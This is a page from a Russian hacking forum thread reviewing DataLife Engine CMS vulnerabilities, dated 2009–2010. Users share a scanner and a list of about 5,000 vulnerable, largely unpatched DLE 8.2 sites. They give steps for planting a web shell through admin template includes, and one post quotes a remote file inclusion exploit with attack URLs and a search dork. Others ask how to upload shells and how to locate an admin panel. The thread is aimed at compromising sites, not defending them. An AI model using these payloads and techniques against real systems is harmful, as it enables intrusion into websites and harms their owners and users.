HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей DataLife Engine ]
   
Ответ
Страница 10 из 39 « Первая < 6 7 8 9 10 11 12 13 14 20 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.11.2009, 15:19
hellorin
Новичок
Регистрация: 15.01.2008
Сообщений: 15
С нами: 9643234

Репутация: 0
По умолчанию
Цитата:
Сообщение от slva2000  
Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL.

http://depositfiles.com/files/6s4qs35gb

Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам.

Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
Сцыль с базой обовить бы ...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 03.12.2009, 22:42
zetaap
Новичок
Регистрация: 07.05.2009
Сообщений: 3
С нами: 8954201

Репутация: 0
По умолчанию
slva2000 Ссылочки обновите пожалуйста
 
Ответить с цитированием

  #3  
Старый 02.01.2010, 18:47
Useroff
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
С нами: 9324443

Репутация: 52
По умолчанию
Цитата:
http://site.com//language/Russian/website.lng
Боян - .htaccess

// будет работать на старых версиях, в новых хтакссесс поумалчанию залит.
H00k
Последний раз редактировалось ZAMUT; 13.01.2010 в 00:07..
 
Ответить с цитированием

  #4  
Старый 16.02.2010, 00:29
Spamik
Новичок
Регистрация: 09.11.2009
Сообщений: 5
С нами: 8686436

Репутация: -5
По умолчанию
Цитата:
Сообщение от Useroff  
Боян - .htaccess

// будет работать на старых версиях, в новых хтакссесс поумалчанию залит.
H00k
Да там все 3 файла смотреть можно
 
Ответить с цитированием

  #5  
Старый 13.01.2010, 23:30
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
По умолчанию
Может кто запалит способ заливки шелла через админские права в DLE v8.2 есть же способ! Лично я ++ поставлю! =)
 
Ответить с цитированием

  #6  
Старый 14.01.2010, 03:06
In.Exploit
Banned
Регистрация: 03.12.2009
Сообщений: 173
С нами: 8652576

Репутация: 47
По умолчанию
Цитата:
Сообщение от SuNDowN  
Может кто запалит способ заливки шелла через админские права в DLE v8.2 есть же способ! Лично я ++ поставлю! =)
Есть. в login.tpl

или там где выбор шаблона для категории.

или же инклудь в маин.тпл
 
Ответить с цитированием

  #7  
Старый 15.01.2010, 13:37
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
Wink
Цитата:
Сообщение от In.Exploit  
Есть. в login.tpl

или там где выбор шаблона для категории.

или же инклудь в маин.тпл
При помощи этого товарища и своих усилей нашёл способ заливки шелла через админ панель, впрочем она нечем не отличается от выше указанных просто в версиях от 8.0, а именно в 8.2 нужно в маин.тпл инклудить при помощи тега:
Код:
{include file="file.php"}
 
Ответить с цитированием

  #8  
Старый 17.01.2010, 20:58
V1sTeR
Новичок
Регистрация: 27.10.2009
Сообщений: 1
С нами: 8704804

Репутация: 0
По умолчанию
Кроме шаблона, можно еще как-нибудь залить шелл? DLE 7.5-8.3
 
Ответить с цитированием

  #9  
Старый 31.01.2010, 21:44
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию
Цитата:
================================================== ======================================
| # Title : DataLife Engine 8.3 RFI Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com/vb
| # Script Home : http://villehost.net/files/DataLife%20Engine%208.3%20Full%20English%20UTF-8%20Encoded%20-%20www.cms-pedia.com.rar (pass=www.cms-pedia.com)
| # Dork : Powered by CMS Pedia � 2009 (DataLife Engine Support � 2009. CMS Pedia)
| # Tested on : windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : RFI
====================== Exploit By indoushka =================================
# Exploit :

1- RFI

http://localhost/upload/engine/inc/include/init.php?selected_language=http://localhost/c.txt?

http://localhost/upload/engine/inc/help.php?config[langs]=http://localhost/c.txt?

http://localhost/upload/engine/ajax/pm.php?config[lang_=[EV!L]

http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?

http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?

http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
Последний раз редактировалось RedX; 31.01.2010 в 21:47..
 
Ответить с цитированием

  #10  
Старый 10.02.2010, 10:43
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию
Вопрос. Такой. есть Доступ к БД. Могу сдлеать юзеру админ права. Но немогу найти админку. что посоветуете?
 
Ответить с цитированием
Ответ
Страница 10 из 39 « Первая < 6 7 8 9 10 11 12 13 14 20 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.